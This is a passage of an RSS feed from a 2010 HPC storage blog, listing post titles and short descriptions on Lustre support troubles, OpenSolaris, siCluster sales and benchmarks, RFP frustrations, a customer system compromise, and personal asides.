      <description>Years ago, we helped a customer set up a Lustre 1.4.x system. This was &amp;hellip; well &amp;hellip; fun. And not in a good way. Right before the 1.6 transition, we had all sorts of problems. We skipped 1.6, and now we have set up a Lustre 1.8.2 system, and have several on quote now for various RFPs. From our experience with the 1.8.2 system &amp;hellip; I have to say, I have a sense that it is brittle.</description>
    </item>
    
    <item>
      <title>Imagine ... trying to get something as simple as a quote for Lustre support ...</title>
      <link>https://blog.scalability.org/2010/03/imagine-trying-to-get-something-as-simple-as-a-quote-for-lustre-support/</link>
      <pubDate>Thu, 01 Apr 2010 01:53:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/imagine-trying-to-get-something-as-simple-as-a-quote-for-lustre-support/</guid>
      <description>&amp;hellip; and not being able to. Seems most of the folks at Sun/Oracle haven&amp;rsquo;t heard of Lustre. I had to explain it to them on several calls yesterday. They didn&amp;rsquo;t understand why someone would want to pay for support of a GPL licensed system &amp;hellip; er &amp;hellip; ah &amp;hellip; mebbe we found some real nice gotchas, and want to get Sun to work on them, and give us a hand in ameliorating them?</description>
    </item>
    
    <item>
      <title>now OpenSolaris&#39; future in doubt</title>
      <link>https://blog.scalability.org/2010/03/now-opensolaris-future-in-doubt/</link>
      <pubDate>Wed, 31 Mar 2010 11:16:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/now-opensolaris-future-in-doubt/</guid>
      <description>Sun/Oracle has decided to change strategy around Solaris.
What does this do for Nexenta and others, with business dependencies upon OpenSolaris? We looked to OpenSolaris for a more up-to-date, less buggy Solaris. We are looking at this for one of our siCluster offerings &amp;hellip; this might have to change now. Makes sense from an Oracle perspective though.</description>
    </item>
    
    <item>
      <title>The fat lady&#39;s song is now over, and the curtain is falling</title>
      <link>https://blog.scalability.org/2010/03/the-fat-ladys-song-is-now-over-and-the-curtain-is-falling/</link>
      <pubDate>Tue, 30 Mar 2010 22:49:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/the-fat-ladys-song-is-now-over-and-the-curtain-is-falling/</guid>
      <description>SCO lost. As I had said to some local colleagues who were (for reasons I could not grasp) swayed by SCO&amp;rsquo;s arguments, this would not end well for SCO. And it didn&amp;rsquo;t. The game is effectively over. Its time to wind down SCO as an entity in an orderly manner, to distribute the remaining value to those that SCO owes money to.</description>
    </item>
    
    <item>
      <title>This could be huge ... and disruptive</title>
      <link>https://blog.scalability.org/2010/03/this-could-be-huge-and-disruptive/</link>
      <pubDate>Mon, 29 Mar 2010 23:26:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/this-could-be-huge-and-disruptive/</guid>
      <description>ACLU seems to have taken down the BRCA gene patent from Myriad Genetics. This could actually change a chunk of the drug development business model. I am not sure if this is a good thing (the business model change), though I also didn&amp;rsquo;t think that one could patent what is effectively naturally generated prior art. Patents are about reducing theory to practice, and then providing a temporary monopoly on the use of that reduction to practice.</description>
    </item>
    
    <item>
      <title>The evolution of the data center</title>
      <link>https://blog.scalability.org/2010/03/the-evolution-of-the-data-center/</link>
      <pubDate>Sun, 28 Mar 2010 20:59:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/the-evolution-of-the-data-center/</guid>
      <description>Way back in the day, data centers used to be cold. Cold air came in, and usually in hot-aisle/cold-aisle configs, left through the back. Power per rack was measured in a few thousand watts. Cooling per rack could be mebbe one ton of AC. Up to two in the worst case. Then stuff got denser. Somewhere along the line someone decided they could run their stuff at higher temperatures. This works fine for machines that are actually mostly open space (blades, sparsely populated server systems, &amp;hellip;).</description>
    </item>
    
    <item>
      <title>There is/was a name for my pain</title>
      <link>https://blog.scalability.org/2010/03/there-iswas-a-name-for-my-pain/</link>
      <pubDate>Sun, 28 Mar 2010 20:47:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/there-iswas-a-name-for-my-pain/</guid>
      <description>&amp;hellip; yeah, the kidney stone saga continues. Had a basket extraction Wednesday, fine most of Thursday till evening, then Friday morning, they decided to remind me who was boss. Off the the ER I went, in terrible pain. Kidney stones are not life threatening, though there are times you wish death was less painful. Well, now one of 3 has been removed (second extraction), other 2 will be blown up soon.</description>
    </item>
    
    <item>
      <title>Don&#39;t share anything important or of value via Linkedin ... they will own it!</title>
      <link>https://blog.scalability.org/2010/03/dont-share-anything-important-or-of-value-via-linkedin-they-will-own-it/</link>
      <pubDate>Sun, 28 Mar 2010 15:48:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/dont-share-anything-important-or-of-value-via-linkedin-they-will-own-it/</guid>
      <description>[update] trackbacks/pingbacks temporarily disabled. Waaay too much spam. Seriously. From their updated user agreement:
They own you &amp;hellip; or at least anything you say or can be linked to you saying.</description>
    </item>
    
    <item>
      <title>On the test track with a new rev jr4</title>
      <link>https://blog.scalability.org/2010/03/on-the-test-track-with-a-new-rev-jr4/</link>
      <pubDate>Thu, 25 Mar 2010 14:27:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/on-the-test-track-with-a-new-rev-jr4/</guid>
      <description>Finishing a siCluster build for a customer. We need to see what we can do here. On the test track, and opening up the throttle wide.
[root@&amp;lt;a href=&amp;quot;http://scalableinformatics.com/jackrabbit&amp;quot;&amp;gt;jr4&amp;lt;/a&amp;gt;-1 burn-in]# fio sw.fio write: io=97,808MB, bw=1,501MB/s, iops=188, runt= 65183msec ... Run status group 0 (all jobs): WRITE: io=97,808MB, aggrb=1,501MB/s, minb=1,537MB/s, maxb=1,537MB/s, mint=65183msec, maxt=65183msec [root@jr4-1 burn-in]# fio sr.fio ... read : io=97,808MB, bw=1,975MB/s, iops=248, runt= 49521msec Run status group 0 (all jobs): READ: io=97,808MB, aggrb=1,975MB/s, minb=2,022MB/s, maxb=2,022MB/s, mint=49521msec, maxt=49521msec  Thats nice &amp;hellip;</description>
    </item>
    
    <item>
      <title>Fixed up some of the siCluster tools</title>
      <link>https://blog.scalability.org/2010/03/fixed-up-some-of-the-sicluster-tools/</link>
      <pubDate>Sat, 20 Mar 2010 23:41:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/fixed-up-some-of-the-sicluster-tools/</guid>
      <description>Well &amp;hellip; more correctly, fixed the data model to be saner, so that the tools would be easier to develop and use. Still a few more things to do, and one (simple) presentation abstraction to set up. The gist of it is that (apart from the automatically added nodes), adding nodes by hand should be easy. This also means by XML (not done yet, but I know how to do this), and web (basically XML or CGI like devices).</description>
    </item>
    
    <item>
      <title>Ceph client made it in to 2.6.34</title>
      <link>https://blog.scalability.org/2010/03/ceph-client-made-it-in-to-2-6-34/</link>
      <pubDate>Sat, 20 Mar 2010 00:06:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/ceph-client-made-it-in-to-2-6-34/</guid>
      <description>I&amp;rsquo;ve pointed to Ceph before. It is an object storage file system, with lots of very nice features, current and planned. As a cluster file system, it has much going for it. Combined with btrfs, and a few other things, this could be a very exciting development. This is a good thing. Stay tuned for more. We&amp;rsquo;ll have some basic testing up in a while. We&amp;rsquo;ll start at 2.6.34 to use the merged bits.</description>
    </item>
    
    <item>
      <title>Addison Snell&#39;s HPC trends: Interesting things, and a few comments we take issue with</title>
      <link>https://blog.scalability.org/2010/03/addison-snells-hpc-trends-interesting-things-and-a-few-comments-we-take-issue-with/</link>
      <pubDate>Fri, 19 Mar 2010 13:33:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/addison-snells-hpc-trends-interesting-things-and-a-few-comments-we-take-issue-with/</guid>
      <description>I found the article on InsideHPC about Addison&amp;rsquo;s presentation quite useful. The presentation is available from the link above. Some points he made, I&amp;rsquo;d like to take issue with. Specifically, page 9, he notes that Windows HPC is &amp;ldquo;still coming&amp;rdquo;. I am not too sure of this. I think it has been a multi-year, almost half decade experiment, that at some point, needs to show that its revenue is greater than the cost of that revenue.</description>
    </item>
    
    <item>
      <title>As the market changes ...</title>
      <link>https://blog.scalability.org/2010/03/as-the-market-changes/</link>
      <pubDate>Thu, 18 Mar 2010 23:42:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/as-the-market-changes/</guid>
      <description>I&amp;rsquo;ve argued for a while that accelerators are going to be a creative and destructive force in HPC. They profoundly change the cost per cycle landscape, as well as the number of cycles per unit time. I&amp;rsquo;ve pointed out here that despite some misunderstanding of transformative technological trends, that better cheaper faster is one of the most important driving forces in HPC. It is a viable business model if you can figure out how to get the appropriate traction, and its very hard for larger organizations to adequately respond.</description>
    </item>
    
    <item>
      <title>A good read: from Glen at Dell</title>
      <link>https://blog.scalability.org/2010/03/a-good-read-from-glen-at-dell/</link>
      <pubDate>Thu, 18 Mar 2010 22:16:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/a-good-read-from-glen-at-dell/</guid>
      <description>For those who don&amp;rsquo;t know Dr. Glen Otero, he has been a tireless advocate for all things HPC in Life sciences. His background is in computational immunology. Great to work with. He has an article on the Dell Tech Center (yeah, I know, I need to update the blogroll, I&amp;rsquo;ll do it this weekend) on a &amp;ldquo;controversy&amp;rdquo; thats been finding fertile ground in the conspiracy theory amplifying interwebs. I highly recommend this article.</description>
    </item>
    
    <item>
      <title>Hmmm ... looks like some of these hinted results were run on our siCluster</title>
      <link>https://blog.scalability.org/2010/03/hmmm-looks-like-some-of-these-hinted-results-were-run-on-our-sicluster/</link>
      <pubDate>Mon, 15 Mar 2010 16:00:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/hmmm-looks-like-some-of-these-hinted-results-were-run-on-our-sicluster/</guid>
      <description>see this link for more. Specifically the mention of
Yeah &amp;hellip; definitely a siCluster benchmark. Its a shame we weren&amp;rsquo;t asked for help promoting this. We have quite a few nice results with this system. The benchmarks for end user accessable streaming performance are hard for many folks to believe. You should hear some of the comments we get, such as &amp;ldquo;there is no way you can achieve these results with your setup.</description>
    </item>
    
    <item>
      <title>&#34;New&#34; File systems worth watching</title>
      <link>https://blog.scalability.org/2010/03/new-file-systems-worth-watching/</link>
      <pubDate>Sun, 14 Mar 2010 13:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/new-file-systems-worth-watching/</guid>
      <description>The day job currently has siClusters in the field with GlusterFS, Lustre, and a few other &amp;ldquo;older&amp;rdquo; parallel file systems. GlusterFS is a distributed file system with a very interesting and powerful design concept. It is under active development by a venture backed company, Gluster, Inc. I can&amp;rsquo;t say enough good things about it, and the company behind it. The day job is in a relationship with them, so you may take this information for what its worth, and weight it accordingly.</description>
    </item>
    
    <item>
      <title>OT: Kidney stones are not fun</title>
      <link>https://blog.scalability.org/2010/03/ot-kidney-stones-are-not-fun/</link>
      <pubDate>Fri, 12 Mar 2010 15:29:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/ot-kidney-stones-are-not-fun/</guid>
      <description>Thats how I am spending my Friday. Oh happy happy joy joy</description>
    </item>
    
    <item>
      <title>second siCluster sold and being built, third hopefully on its way to being ordered</title>
      <link>https://blog.scalability.org/2010/03/second-sicluster-sold-and-being-built-thid-hopefully-on-its-way-to-being-ordered/</link>
      <pubDate>Fri, 12 Mar 2010 15:26:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/second-sicluster-sold-and-being-built-thid-hopefully-on-its-way-to-being-ordered/</guid>
      <description>[one must not post when on pain medication &amp;hellip; nope, bad idea] somewhat exceeding our targets for Q1 on these units. I had hoped to have had an additional sales resource online by now, but the person I wanted to hire chose a different path. More power to him. Will continue to look for the right person (here in Michigan). First siCluster in Texas. University deal, GlusterFS atop it. Several more deals we are working on as well.</description>
    </item>
    
    <item>
      <title>Sale announcement coming for day job soon</title>
      <link>https://blog.scalability.org/2010/03/sale-announcement-coming-for-day-job-soon/</link>
      <pubDate>Tue, 09 Mar 2010 10:18:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/sale-announcement-coming-for-day-job-soon/</guid>
      <description>We are working on the text of this, but it is for organizations within the state of Michigan. We like our state, and we are going to give an extra discount for credit card/cash purchases over the next few months. Details to emerge. If there is interest outside of the state of Michigan, please reply below. The day job has some of the highest performing, and most reasonably priced storage available in the market today.</description>
    </item>
    
    <item>
      <title>Compute safely ... attacks on the rise</title>
      <link>https://blog.scalability.org/2010/03/compute-safely-attacks-on-the-rise/</link>
      <pubDate>Tue, 09 Mar 2010 09:36:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/compute-safely-attacks-on-the-rise/</guid>
      <description>Going this morning to a customer who had a set of systems compromised. It appears that a windows trojan did some keylogging, and someone logged in, as root, from the compromised machine. Whoops. Folks, stay safe. Don&amp;rsquo;t use passwords for ssh. Use keys. And, bluntly, seriously reconsider running any windows machine anywhere near a server/HPC resource. Our efforts to help fix their problem are going to cost this customer thousands of dollars and lots of our time.</description>
    </item>
    
    <item>
      <title>Update on the RFP bit from before</title>
      <link>https://blog.scalability.org/2010/03/update-on-the-rfp-bit-from-before/</link>
      <pubDate>Tue, 09 Mar 2010 09:29:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/update-on-the-rfp-bit-from-before/</guid>
      <description>We had been considered sending in an RFP response to a customer for a system. Long past history with this customer suggests that they are basically interested in validation and consulting from us, never really interested in purchasing from us. This is unfortunate, as we are Michigan&amp;rsquo;s only local HPC company, and they are a university in the state of Michigan purchasing HPC gear. It makes it look good for them with their higher ups to include us, even if they never award us any business.</description>
    </item>
    
    <item>
      <title>Intel success story is up</title>
      <link>https://blog.scalability.org/2010/03/intel-success-story-is-up/</link>
      <pubDate>Mon, 08 Mar 2010 17:31:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/intel-success-story-is-up/</guid>
      <description>see here. It looks like they largely ignored my edits, so some of the numbers which I fixed several times aren&amp;rsquo;t fixed in the final. Also, I don&amp;rsquo;t have the slightest clue who that person is on the document. Not a clue. Has no relation to Scalable Informatics.</description>
    </item>
    
    <item>
      <title>must remember ... most installation tools aren&#39;t that good</title>
      <link>https://blog.scalability.org/2010/03/must-remember-most-installation-tools-arent-that-good/</link>
      <pubDate>Wed, 03 Mar 2010 16:58:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/must-remember-most-installation-tools-arent-that-good/</guid>
      <description>Autoyast, kickstart, &amp;hellip; All of them suffer from the &amp;ldquo;hey lets do it all for you&amp;rdquo;. Don&amp;rsquo;t get lured into this. Assume they are singing a siren&amp;rsquo;s song. I&amp;rsquo;ll argue that autoyast is lightyears ahead of anaconda by virtue of it not ^&amp;amp;$^*&amp;amp;) forcing you to reboot the machine in the event of a control file error, you can recover. But the point I need to stress, despite (likely) vehement protests to the contrary &amp;hellip; One should spend as little time as possible inside distro configurators, and push as much of this work to outside tools as possible.</description>
    </item>
    
    <item>
      <title>OT:  Looks like the UK physics community shares similar thoughts</title>
      <link>https://blog.scalability.org/2010/03/ot-looks-like-the-uk-physics-community-shares-similar-thoughts/</link>
      <pubDate>Mon, 01 Mar 2010 23:07:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/ot-looks-like-the-uk-physics-community-shares-similar-thoughts/</guid>
      <description>Coming from the Register &amp;hellip;
Yeah &amp;hellip; leave it to folks in the UK to say it with far more eloquence than I can. But there is more. Oh &amp;hellip; much more &amp;hellip;
Imagine if you have to tell the people giving you money to lend credence to their policy, to provide a sound theoretical and evidentiary basis for the policy &amp;hellip; that there are at minimum, nagging doubts, and at maximum, the policy is based upon weak or incorrect science &amp;hellip; imagine telling these people that they are wrong.</description>
    </item>
    
    <item>
      <title>Brief note and comic on &#34;settled science&#34; ...</title>
      <link>https://blog.scalability.org/2010/02/brief-note-and-comic-on-settled-science/</link>
      <pubDate>Sun, 28 Feb 2010 13:06:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/brief-note-and-comic-on-settled-science/</guid>
      <description>A tactic used by advocates of a particular viewpoint on anthropogenic global warming (e.g. we humans caused warming on our planet) is to make the claim that the science is &amp;ldquo;settled&amp;rdquo;. I covered this before. Specifically I pointed out that science is never &amp;hellip; ever &amp;ldquo;settled&amp;rdquo;. In fact, the very fundamental aspect of what makes science a profoundly useful to humanity, is that it questions and is free to question everything.</description>
    </item>
    
    <item>
      <title>we blowed up da router ...</title>
      <link>https://blog.scalability.org/2010/02/we-blowed-up-da-router/</link>
      <pubDate>Sat, 27 Feb 2010 18:37:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/we-blowed-up-da-router/</guid>
      <description>At the day job. Ok, not a complete blow up &amp;hellip; but it lost all of its config for 2 hours. Its an appliance router, and about 4 years old. Starting to show its age. I have a &amp;ldquo;spare&amp;rdquo; (as in unused) motherboard/RAM combo, with 4x Intel GbE ports (2x PCI-x cards) that looks like its going to take its place. Just deciding upon the distro to do this. Looking at endian, clearos, and a few others.</description>
    </item>
    
    <item>
      <title>SLES 11 does not correctly support software RAID1 for boot disk</title>
      <link>https://blog.scalability.org/2010/02/sles-11-does-not-correctly-support-software-raid1-for-boot-disk/</link>
      <pubDate>Sat, 27 Feb 2010 04:31:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/sles-11-does-not-correctly-support-software-raid1-for-boot-disk/</guid>
      <description>I&amp;rsquo;ve been chasing down a problem for a few days on a SLES 11 load. I&amp;rsquo;ve tried basic mdadm as well as the &amp;ldquo;Intel RAID&amp;rdquo;. Modified some of the mkinitrd scripts so that it doesn&amp;rsquo;t error out, and actually builds the initrd. But it never includes the mdadm or the /etc/mdadm.conf files. So the boot with the new initrd can&amp;rsquo;t assemble the raid correctly, and can&amp;rsquo;t do a correct switchroot to the raid device.</description>
    </item>
    
    <item>
      <title>A tale of an RFP gone wrong</title>
      <link>https://blog.scalability.org/2010/02/a-tale-of-an-rfp-gone-wrong/</link>
      <pubDate>Sat, 27 Feb 2010 01:18:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/a-tale-of-an-rfp-gone-wrong/</guid>
      <description>&amp;hellip; sadly this appears to be true. Specifications were given, and we met the requirements, which entailed a demonstration of a particular level of performance over NFS. In case you aren&amp;rsquo;t sure, we demonstrated a sustained 1GB/s over NFS between 2 boxes over 10GbE last year. There aren&amp;rsquo;t too many companies that can do this. Our results were with RAID6 storage target, and an NFS client with small RAM size. Total read and write size each was much larger than either system memory.</description>
    </item>
    
    <item>
      <title>On the difference between marketing numbers, and measured numbers ...</title>
      <link>https://blog.scalability.org/2010/02/on-the-difference-between-marketing-numbers-and-measured-numbers/</link>
      <pubDate>Sat, 27 Feb 2010 01:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/on-the-difference-between-marketing-numbers-and-measured-numbers/</guid>
      <description>I should define what I mean by marketing numbers. These are best effort benchmarking numbers assuming the best of all possible test cases, with equipment functioning solely for the benchmark test purposes. These are not benchmark results you will normally achieve in practice. They represent an extrema in performance. Measured benchmark numbers are sensitive to many factors. You need to perform several tests, make sure you can construct an &amp;ldquo;average&amp;rdquo; and make an assumption about the shape of the distribution around that average.</description>
    </item>
    
    <item>
      <title>When &#34;required&#34; specifications don&#39;t matter on RFPs ...</title>
      <link>https://blog.scalability.org/2010/02/when-specifications-dont-matter-on-rfps/</link>
      <pubDate>Fri, 26 Feb 2010 15:56:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/when-specifications-dont-matter-on-rfps/</guid>
      <description>I&amp;rsquo;d mentioned this before in other contexts. But we just had an opportunity to bid on something with a very high data rate requirement. We provided a bid with a measurement indicating our performance, knowing full well we were one of very few vendors capable of this sort of performance. Yet purchasing folks appear not to take the &amp;ldquo;required&amp;rdquo; specifications into consideration. I actually feel bad for the user who is going to get a box that won&amp;rsquo;t be able to meet their needs, thanks to this process.</description>
    </item>
    
    <item>
      <title>I think that was the easiest upgrade I have ever experienced</title>
      <link>https://blog.scalability.org/2010/02/i-think-that-was-the-easiest-upgrade-i-have-ever-experienced/</link>
      <pubDate>Fri, 26 Feb 2010 03:20:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/i-think-that-was-the-easiest-upgrade-i-have-ever-experienced/</guid>
      <description>This was moving to Wordpress 2.9.2. One button. Thats it. Click it. Everything worked afterward. No drama, no complexity. No wizard. It. Just. Worked. I find this very inspirational. Makes me think we want to do this with our stack.</description>
    </item>
    
    <item>
      <title>On the importance of speed ... part 1 of likely many</title>
      <link>https://blog.scalability.org/2010/02/on-the-importance-of-speed-part-1-of-likely-many/</link>
      <pubDate>Wed, 24 Feb 2010 04:17:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/on-the-importance-of-speed-part-1-of-likely-many/</guid>
      <description>Raw end user accessible performance on data motion, data storage is rapidly becoming one of the most important problems in any HPC system. We&amp;rsquo;ve been talking about it for years, but its getting far more important by the day. And not just in HPC. I just spent a long time on the phone with someone from a government agency talking about their need for high performance storage, and analytical capability. We hear these refrains quite commonly, FC4/FC8 is simply too slow for their workloads, and they need to go faster.</description>
    </item>
    
    <item>
      <title>I admit it, I am conflicted</title>
      <link>https://blog.scalability.org/2010/02/i-admit-it-i-am-conflicted/</link>
      <pubDate>Wed, 24 Feb 2010 04:03:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/i-admit-it-i-am-conflicted/</guid>
      <description>We have been sent an RFP from a university we have some history with on bids. Our history has been, not winning the business. The winning bids sometimes (often) deviate wildly from the specifications as we read them. One thing I have learned from my experience with them is that the singular most important aspect of any bid is the price we present to them. You might think &amp;ldquo;well &amp;hellip; duh&amp;rdquo; buts its more subtle than that.</description>
    </item>
    
    <item>
      <title>&#34;Sustaining&#34; strategies and startups</title>
      <link>https://blog.scalability.org/2010/02/sustaining-strategies-and-startups/</link>
      <pubDate>Tue, 23 Feb 2010 18:28:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/sustaining-strategies-and-startups/</guid>
      <description>I read an article on InsideHPC.com that I can&amp;rsquo;t say I agree with. The discussion on creative destruction is correct. You create a new market by destroying an old market. That has happened many times in HPC, by enabling better, cheaper, faster execution. If our SGI boxen of days old were 1/100th the cost of the Cray YMP at the time, and 20% of the performance, who won that battle? In all but a vanishingly small number of cases, SGI won.</description>
    </item>
    
    <item>
      <title>back in the saddle: Arrived from Florida to 8&#43; inches of snow on my driveway</title>
      <link>https://blog.scalability.org/2010/02/back-in-the-saddle-arrived-from-florida-to-8-inches-of-snow-on-my-driveway/</link>
      <pubDate>Tue, 23 Feb 2010 17:16:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/back-in-the-saddle-arrived-from-florida-to-8-inches-of-snow-on-my-driveway/</guid>
      <description>Yeah &amp;hellip; that was fun. Back at work. Things have been busy.</description>
    </item>
    
    <item>
      <title>BTW:  I am out on vacation (holiday for most of the non-US world) ... working ... iphone ... yadda yadda</title>
      <link>https://blog.scalability.org/2010/02/btw-i-am-out-on-vacation-holiday-for-most-of-the-non-us-world-working-iphone-yadda-yadda/</link>
      <pubDate>Tue, 16 Feb 2010 03:38:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/btw-i-am-out-on-vacation-holiday-for-most-of-the-non-us-world-working-iphone-yadda-yadda/</guid>
      <description>Spent several days in Orlando Florida (the house of mouse), and today drove to Key West, after a short stop in Miami to visit a friend, his wife, and their newly 1 year old daughter. Of course, upon getting to Key West, first our hotel door wouldn&amp;rsquo;t open, and then when we figured out the trick with the help of the hotel person, we inserted our card into the door, and the lights went out on the Island.</description>
    </item>
    
    <item>
      <title>OpenSolaris 10 (9.06) is pretty good for a task we had tested it with</title>
      <link>https://blog.scalability.org/2010/02/opensolaris-10-9-06-is-pretty-good-for-a-task-we-had-tested-it-with/</link>
      <pubDate>Tue, 16 Feb 2010 03:12:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/opensolaris-10-9-06-is-pretty-good-for-a-task-we-had-tested-it-with/</guid>
      <description>I&amp;rsquo;ll describe it more later, but this will be showing up in our siCluster units in short order. Some experiments we did on this over the past week have met with a resounding success, and give us a level of flexibility that I hadn&amp;rsquo;t anticipated before. Now, if I can figure out how to integrate Tiburon and Jumpstart (launch Jumpstart from Tiburon), or figure out how to provision OpenSolaris systems over PXE boot.</description>
    </item>
    
    <item>
      <title>On the joys of attempting to get Solaris 10 u8 installed on a JR4</title>
      <link>https://blog.scalability.org/2010/02/on-the-joys-of-attempting-to-get-solaris-10-u8-installed-on-a-jr4/</link>
      <pubDate>Wed, 10 Feb 2010 05:28:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/on-the-joys-of-attempting-to-get-solaris-10-u8-installed-on-a-jr4/</guid>
      <description>A customer wants to test this. We want to load it for them. As we have discovered in the process &amp;hellip;. &amp;hellip; Solaris 10 (not OpenSolaris) doesn&amp;rsquo;t like SATA DVD drives. Since the motherboard has no IDE drive, we are SOL there. But wait, can&amp;rsquo;t we use a nice shiny USB DVD drive? No dice. Doesn&amp;rsquo;t work. &amp;hellip; ok What about a PXE boot load? Lets make it nice and simple.</description>
    </item>
    
    <item>
      <title>[updated]  latency characteristics for the SDR Mellanox card MT25204</title>
      <link>https://blog.scalability.org/2010/02/bad-latency-characteristics-for-the-sdr-mellanox-card-mt25204/</link>
      <pubDate>Tue, 09 Feb 2010 15:55:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/bad-latency-characteristics-for-the-sdr-mellanox-card-mt25204/</guid>
      <description>[update] This was a PCI contention issue. Customers original code and test cases did not tickle this performance feature.. Their next code did. ConnectX was designed to handle codes of the latter type. Its also quite dangerous to take as gospel any of the output of diagnostic programs without their context. And if you are a vendor, and you have a customer reporting things like this, have a careful look at what they are doing.</description>
    </item>
    
    <item>
      <title>OT:  some security incident this morning at Detroit Metro Airport (DTW)</title>
      <link>https://blog.scalability.org/2010/02/ot-some-security-incident-this-morning-at-detroit-metro-airport-dtw/</link>
      <pubDate>Mon, 08 Feb 2010 14:23:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/ot-some-security-incident-this-morning-at-detroit-metro-airport-dtw/</guid>
      <description>Few details. My wife heard a report from an eye-witness to it. Nothing concrete yet, nothing I can definitively report. What was told to me was that the incident was in the concourse, security tried to apprehend someone, and they were eventually walked out. I also heard something about a police officer carrying something &amp;ldquo;with wires hanging out&amp;rdquo;. Hopefully we will hear something soon.</description>
    </item>
    
    <item>
      <title>revamping the day-job&#39;s web store</title>
      <link>https://blog.scalability.org/2010/02/revamping-the-day-jobs-web-store/</link>
      <pubDate>Sat, 06 Feb 2010 21:39:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/revamping-the-day-jobs-web-store/</guid>
      <description>Our webstore has been a good thing for us to implement, it has driven purchases (more indirectly than directly). But it is somewhat hard to maintain, and causes significant issues when we want to update it. Moreover, its not sufficiently flexible that people can configure specific systems on it, such as siCluster. So we are revamping it. Rethinking some of the basic bits. Hopefully these bits of re-thinking will result in a better experience for everyone.</description>
    </item>
    
    <item>
      <title>Interesting results from Microsoft&#39;s SQLio benchmark on JR4</title>
      <link>https://blog.scalability.org/2010/02/interesting-results-from-microsofts-sqlio-benchmark-on-jr4/</link>
      <pubDate>Sat, 06 Feb 2010 21:33:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/interesting-results-from-microsofts-sqlio-benchmark-on-jr4/</guid>
      <description>I&amp;rsquo;ll have the full set of numbers soon from the tests our customer was running on their shiny new JR4 (they agreed to let us talk about them). One of the more interesting take-aways is that the 24 drive unit appears to provide something a bit north of 5000 IOPs in a number of the random tests, doing seeks on files larger than ram. I need to think this through somewhat.</description>
    </item>
    
    <item>
      <title>Why is it that I get more work done on a saturday at the office than all week long at the office?</title>
      <link>https://blog.scalability.org/2010/02/why-is-it-that-i-get-more-work-done-on-a-saturday-at-the-office-than-all-week-long-at-the-office/</link>
      <pubDate>Sat, 06 Feb 2010 21:25:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/why-is-it-that-i-get-more-work-done-on-a-saturday-at-the-office-than-all-week-long-at-the-office/</guid>
      <description>No &amp;hellip; seriously. I solved 2 long standing issues today, one for an internal system now running 12 cores and 32 GB ram (needed a bios update), and the other was fixing the ()&amp;amp;&amp;amp;%%$^%(*&amp;amp; problems with a set of GA180 cards. I dunno, I think the issue is that I have ample time to think without interruption. The family is off swimming (wish I were with them), but getting this done is important.</description>
    </item>
    
    <item>
      <title>Did Ubuntu jump the shark in 9.10?  Yeah ... they did.</title>
      <link>https://blog.scalability.org/2010/02/did-ubuntu-jump-the-shark-in-9-10-yeah-they-did/</link>
      <pubDate>Wed, 03 Feb 2010 01:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/did-ubuntu-jump-the-shark-in-9-10-yeah-they-did/</guid>
      <description>List of things they changed is long. Some major ones &amp;hellip; some &amp;hellip; I dunno &amp;hellip; bad ideas mebbe? like Grub2? Like incompatibilities with various motherboards (struggling with this right now on a home machine rebuild). Like unchangable login windows, and crappy icons for power, mail, volume, unchangable options in gnome &amp;hellip; the xorg config debacle. I could go on. The big one is the nVidia issue. Install restricted drivers. Sure.</description>
    </item>
    
    <item>
      <title>Working on marketing materials for siCluster, new benchmark reports, ...</title>
      <link>https://blog.scalability.org/2010/01/working-on-marketing-materials-for-sicluster-new-benchmark-reports/</link>
      <pubDate>Sat, 30 Jan 2010 14:03:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/working-on-marketing-materials-for-sicluster-new-benchmark-reports/</guid>
